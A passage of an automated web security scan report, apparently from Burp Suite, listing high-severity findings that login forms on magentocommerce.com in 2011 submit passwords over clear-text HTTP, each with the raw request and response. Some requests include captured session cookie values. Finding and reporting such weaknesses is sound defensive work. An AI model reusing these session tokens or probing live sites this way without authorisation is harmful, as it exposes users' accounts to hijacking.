Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Fsolution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:14 GMT
Content-Length: 39161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.110. http://www.magentocommerce.com/partners/view/117/gorilla  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/view/117/gorilla

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/view/117/gorilla HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176374; expires=Sat, 11-Aug-2012 15:12:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fpartners%2Fview%2F117%2Fgorilla%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:54 GMT
Content-Length: 57995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.111. http://www.magentocommerce.com/pl  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pl

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pl HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176513; expires=Sat, 11-Aug-2012 15:15:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fpl%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:13 GMT
Content-Length: 70432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.112. http://www.magentocommerce.com/product/community-edition  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/community-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/community-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Fcommunity-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 32482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.113. http://www.magentocommerce.com/product/compare  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/compare

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/compare HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175710; expires=Sat, 11-Aug-2012 15:01:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fproduct%2Fcompare%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:50 GMT
Content-Length: 47177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.114. http://www.magentocommerce.com/product/deployed-solutions  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/deployed-solutions

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/deployed-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175705; expires=Sat, 11-Aug-2012 15:01:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:45 GMT
Content-Length: 32561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.115. http://www.magentocommerce.com/product/emerging-business  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/emerging-business

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/emerging-business HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_activity=1313170894; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.2.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171056; expires=Sat, 11-Aug-2012 13:44:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:16 GMT
Content-Length: 33707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.116. http://www.magentocommerce.com/product/enterprise-community-faqs  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-community-faqs

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/enterprise-community-faqs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175681; expires=Sat, 11-Aug-2012 15:01:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fproduct%2Fenterprise-community-faqs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:21 GMT
Content-Length: 42996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.117. http://www.magentocommerce.com/product/enterprise-edition  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:00:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175633; expires=Sat, 11-Aug-2012 15:00:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:00:33 GMT
Content-Length: 37947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.118. http://www.magentocommerce.com/product/enterprise-level  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-level

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/enterprise-level HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; exp_domain=magentocommerce.com; exp_last_visit=997810832; exp_last_activity=1313170832; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.1.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894; homepage_intro=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 32647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.119. http://www.magentocommerce.com/product/faq  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/faq

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/faq HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175724; expires=Sat, 11-Aug-2012 15:02:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fproduct%2Ffaq%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:04 GMT
Content-Length: 38677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.120. http://www.magentocommerce.com/product/features  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/features

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/features HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fproduct%2Ffeatures%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 47349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.121. http://www.magentocommerce.com/product/hosted-solutions  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/hosted-solutions

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/hosted-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175686; expires=Sat, 11-Aug-2012 15:01:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fhosted-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:26 GMT
Content-Length: 32763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.122. http://www.magentocommerce.com/product/magento-go  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-go

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/magento-go HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175671; expires=Sat, 11-Aug-2012 15:01:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fproduct%2Fmagento-go%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:11 GMT
Content-Length: 36074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.123. http://www.magentocommerce.com/product/magento-zend  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-zend

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/magento-zend HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
